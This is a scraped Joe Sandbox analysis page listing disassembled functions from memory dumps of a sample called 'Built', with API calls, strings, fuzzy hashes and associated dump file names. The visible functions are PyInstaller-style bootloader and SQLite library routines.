Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 689d6d22bbbe0075ee184b511634bee4b9e22409f5343f22a468899a6fe372b6
Instruction ID: 00508e2fa628a3a4224fb5adf984a65d0b285a962d10c54d4631fa3a1e666b1c
Opcode Fuzzy Hash: 689d6d22bbbe0075ee184b511634bee4b9e22409f5343f22a468899a6fe372b6
Instruction Fuzzy Hash: 5241AC72A0864395EE20DB21EC511F9A390BF84784F444532ED1D97B96DE7EE542EF03

Function 00007FF626641210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1.3.1, xrefs: 00007FF626641249
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF6266412EF
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF6266412BA
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF626641276
malloc, xrefs: 00007FF6266412C1, 00007FF6266412F6
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF62664141E

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: 6d5808cc0d1dceb6cab22bc5ec620fda501ad4cc24dd5ec08cb7c541ead490ed
Instruction ID: 515ac213b7c1416dcf2ad6108da10ef69b9e6f03d4c0f8439df40bd4a45c629f
Opcode Fuzzy Hash: 6d5808cc0d1dceb6cab22bc5ec620fda501ad4cc24dd5ec08cb7c541ead490ed
Instruction Fuzzy Hash: 2951D622A0864281EE709B16EC603BAA691FF85794F444131ED4DD7BC6EF7EE541EB03

Function 00007FF6266436B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF626643804), ref: 00007FF6266436E1
GetLastError.KERNEL32(?,00007FF626643804), ref: 00007FF6266436EB

Part of subcall function 00007FF626642C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF626643706,?,00007FF626643804), ref: 00007FF626642C9E
Part of subcall function 00007FF626642C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF626643706,?,00007FF626643804), ref: 00007FF626642D63
Part of subcall function 00007FF626642C50: MessageBoxW.USER32 ref: 00007FF626642D99

Strings

\\?\, xrefs: 00007FF62664375A
Failed to convert executable path to UTF-8., xrefs: 00007FF626643790
Failed to obtain executable path., xrefs: 00007FF6266436F3
Failed to resolve full path to executable %ls., xrefs: 00007FF626643739
GetModuleFileNameW, xrefs: 00007FF6266436FA

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction ID: 45570c8619e57c85d043a01ff9e3b1bf66a306f24de0ca0e2fbf7e7fec32540f
Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction Fuzzy Hash: 47217E61B1C643D1FE30AB21FC603BA2251BF88344F404232D59DC26D5EE6EE504AB47

Function 00007FF62665BACC Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF62665BEF9

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
Instruction ID: 7140218179b5e8749c6ea5133099ebce6bead08841de322266866f34a0a55e88
Opcode Fuzzy Hash: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
Instruction Fuzzy Hash: 48C1C7A290C68781EF609B1598522BD7764FB81BC0F594131EA4E837D3CF7EE855AB03

Function 00007FF626646350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LoadLibrary, xrefs: 00007FF62664649E
Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF6266463F7
Failed to load Python DLL '%ls'., xrefs: 00007FF626646497
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF6266463B7
ucrtbase.dll, xrefs: 00007FF6266463CD
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF626646446

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
Instruction ID: b283aa1ef220967a4053d6e22b7cd11b26a61899172bbdd7b2bd60c6bb27fab1
Opcode Fuzzy Hash: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
Instruction Fuzzy Hash: 5F419E31A0CA8791EE21DB20EC642E96325FB54384F904132EA5DC3695EF7DE615DB83

Function 00007FFDF1516E60 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 624COMMON

Download Yara Rule

APIs

00007FFE103019A0.VCRUNTIME140 ref: 00007FFDF1516FAA
00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF15174CF

Strings

nolock, xrefs: 00007FFDF15173CC
-journal, xrefs: 00007FFDF15171FE
immutable, xrefs: 00007FFDF15174C5

Memory Dump Source

Source File: 00000005.00000002.2093910912.00007FFDF1501000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDF1500000, based on PE: true

Associated: 00000005.00000002.2093795866.00007FFDF1500000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2093910912.00007FFDF164D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2093910912.00007FFDF1653000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2093910912.00007FFDF1662000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2095517324.00007FFDF1664000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2095597643.00007FFDF1666000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf1500000_Built.jbxd

Similarity

API ID: 00007$B5630E103019
String ID: -journal$immutable$nolock
API String ID: 4161745878-4201244970
Opcode ID: 30796456776be9dc827ca300266d4c86fcf3bc23ff0c8e6200e6eab160e0e5f7
Instruction ID: c38ba439397d8917a40b1c93645105d1ba48f4dcde519064240058febf493d34
Opcode Fuzzy Hash: 30796456776be9dc827ca300266d4c86fcf3bc23ff0c8e6200e6eab160e0e5f7
Instruction Fuzzy Hash: 9952B362B09782AAEB578F299460B7976A9FF05B64F044234DA3E137E9DF3CE455C300

Function 00007FFDF1517E20 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 176COMMON

Download Yara Rule

Strings

database corruption, xrefs: 00007FFDF1517E5B, 00007FFDF1517FC4
%s at line %d of [%.10s], xrefs: 00007FFDF1517E62, 00007FFDF1517FCB
872ba256cbf61d9290b571c0e6d82a20c224ca3ad82971edc46b29818d5d17a0, xrefs: 00007FFDF1517E42, 00007FFDF1517FAB

Memory Dump Source

Source File: 00000005.00000002.2093910912.00007FFDF1501000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDF1500000, based on PE: true

Associated: 00000005.00000002.2093795866.00007FFDF1500000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2093910912.00007FFDF164D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2093910912.00007FFDF1653000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2093910912.00007FFDF1662000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2095517324.00007FFDF1664000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2095597643.00007FFDF1666000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf1500000_Built.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$872ba256cbf61d9290b571c0e6d82a20c224ca3ad82971edc46b29818d5d17a0$database corruption
API String ID: 0-2677786666
Opcode ID: 5fb3990272c111cd25487c46920df837d9f802a995e9483821b62de2704db5e2
Instruction ID: c6b9425c6f53c40f0f50b1717a16b6875a6cbc7c3c157894108df7ddf10d3257
Opcode Fuzzy Hash: 5fb3990272c111cd25487c46920df837d9f802a995e9483821b62de2704db5e2
Instruction Fuzzy Hash: 0E717022B08A4695FB678B16E460B7A77B5FB44B84F144035CA6D1B7E9DF3DE8818340

Function 00007FFDF150BBE0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 110fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 00007FFDF150BCA0
00007FFE103019A0.VCRUNTIME140 ref: 00007FFDF150BD64

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FFDF150BD39
winRead, xrefs: 00007FFDF150BCF8

Memory Dump Source

Source File: 00000005.00000002.2093910912.00007FFDF1501000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDF1500000, based on PE: true

Associated: 00000005.00000002.2093795866.00007FFDF1500000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2093910912.00007FFDF164D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2093910912.00007FFDF1653000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2093910912.00007FFDF1662000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2095517324.00007FFDF1664000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2095597643.00007FFDF1666000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf1500000_Built.jbxd

Similarity

API ID: 00007E103019FileRead
String ID: delayed %dms for lock/sharing conflict at line %d$winRead
API String ID: 3328485117-1843600136
Opcode ID: 3db2b44528deea1de64595f08ae53bbd548d301079de3b61d8e3a0948f022bab
Instruction ID: f9999c9894ef9b2dbfa8a0e212c84c8666b1ed0b69c2fa7e4ea4c0881d3b9d70
Opcode Fuzzy Hash: 3db2b44528deea1de64595f08ae53bbd548d301079de3b61d8e3a0948f022bab
Instruction Fuzzy Hash: C041F226B08A8382E7219F55E490DA97769FB84780F584132EE6E437ECDF3DE5468740

Function 00007FF626655698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6266556C5
CreateFileW.KERNEL32 ref: 00007FF626655704
CloseHandle.KERNEL32 ref: 00007FF626655739

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction ID: b669968a294d62a610042981cd76d72068ba7b7358f279315f5ff6592d131470
Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction Fuzzy Hash: 3841B222D2878283EB109B2199553797360FB947A4F108334EA9C43AD2DF7DB5E09B03

Function 00007FF62664CCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF62664CE7C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF62664CE90

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF62664CCD0
__scrt_release_startup_lock.LIBCMT ref: 00007FF62664CD3E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF62664CD91

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction ID: 5070e567eb79f1ce9303508210198623c0d947ba0dee6997caae636c2699bd51
Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction Fuzzy Hash: 3E314E20E4868385FE74AB249C723B92792BF41784F444435D94DC73D7DEAEA405EB63

Function 00007FFDF15B9570 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 317COMMON

Download Yara Rule

APIs

00007FFE103019A0.VCRUNTIME140(?,?,?,?,00007FFDF150831D,?,?,?,?,00007FFDF1534917,?,?,?,00007FFDF150207B), ref: 00007FFDF15B9708

Strings

gfff, xrefs: 00007FFDF15B9A09

Memory Dump Source

Source File: 00000005.00000002.2093910912.00007FFDF1501000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDF1500000, based on PE: true

Associated: 00000005.00000002.2093795866.00007FFDF1500000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2093910912.00007FFDF164D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2093910912.00007FFDF1653000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2093910912.00007FFDF1662000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2095517324.00007FFDF1664000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2095597643.00007FFDF1666000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf1500000_Built.jbxd

Similarity

API ID: 00007E103019
String ID: gfff
API String ID: 2848303308-1553575800
Opcode ID: 0056acba03f87a82fc2f6ebcffcab0de4440760040fe549533ff5503d775fa8e
Instruction ID: 08d80f7979dea2919f7922c4f715c99fe3e2872e8fbb099ad1690b38e7cd3a4e
Opcode Fuzzy Hash: 0056acba03f87a82fc2f6ebcffcab0de4440760040fe549533ff5503d775fa8e
Instruction Fuzzy Hash: 5AF105A0F0DA1786FB66DB25A870E7532ACAF45B80F144539E83E427EDDF2CA9409740

Function 00007FF6266501AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6266501F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6266502E7

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction ID: 99fa2097cb86ae68a8387e59ae44a807796e822b2923f7a129008aa34f269cf6
Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction Fuzzy Hash: 2151D671A096D286EE249A659C0277A7291BF84BA4F144734DD6C877C7CF3ED401AF03

Function 00007FF62665C1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF62665C33D), ref: 00007FF62665C1F0
GetLastError.KERNEL32(?,?,?,?,?,00007FF62665C33D), ref: 00007FF62665C1FA

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction ID: aa83118576ff7483c60f9ce2848cdab35300d89d2794ca886ea1c8054ce5c15b
Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction Fuzzy Hash: B9112361708A8281DF208B25BC041696362BB81BF0F540335EE7D8BBEACF3DD0119B03

Function 00007FF62665A9B8 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9CE
GetLastError.KERNEL32(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9D8

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
Instruction ID: 822bb9ffbdabdf6e7b509b442c86d2c31bd36f5bb3d1eb928ac2316602c99e37
Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
Instruction Fuzzy Hash: 0DE04610F1820382FF08ABB2AC5613812607F88B40F040034D81DE22A2EE2F6899AB03

Function 00007FF62665ABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00007FF62665AA45,?,?,00000000,00007FF62665AAFA), ref: 00007FF62665AC36
GetLastError.KERNEL32(?,?,?,00007FF62665AA45,?,?,00000000,00007FF62665AAFA), ref: 00007FF62665AC40

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction ID: b211dc0fbf423a356ea9c4b272d5ebd346eedddadc35f718031d43862950b4f7
Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction Fuzzy Hash: CA218411B1C64342EF945761AC9627D1682BF84790F084239D91EC77D3CE6FA449AB43

Function 00007FF62665BF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF62665BF44

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction ID: 7e2b80a5280c0e60023e0bdf626db0267802b0880f429fa676defa7570039e0a
Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction Fuzzy Hash: A041E57290820287EE34DB15E95227973A5FB95B84F100135DA8EC7692CF2FE442DF93

Function 00007FF626647F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF62664802A

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: e68f7924d8d775e7cfc988c1acc5ef8cb841fcb1ab7bf70469a3d80c82781ba4
Instruction ID: fabc97366a2ef45bee363c737e766f59de5ae79455965b615c215ab08a572023
Opcode Fuzzy Hash: e68f7924d8d775e7cfc988c1acc5ef8cb841fcb1ab7bf70469a3d80c82781ba4
Instruction Fuzzy Hash: 9721D321B196D285FE20AA126D153BAA651BF45FC4F8C4434EE4D87786CEBEE041EB43

Function 00007FF62665B9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF62665BA32

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

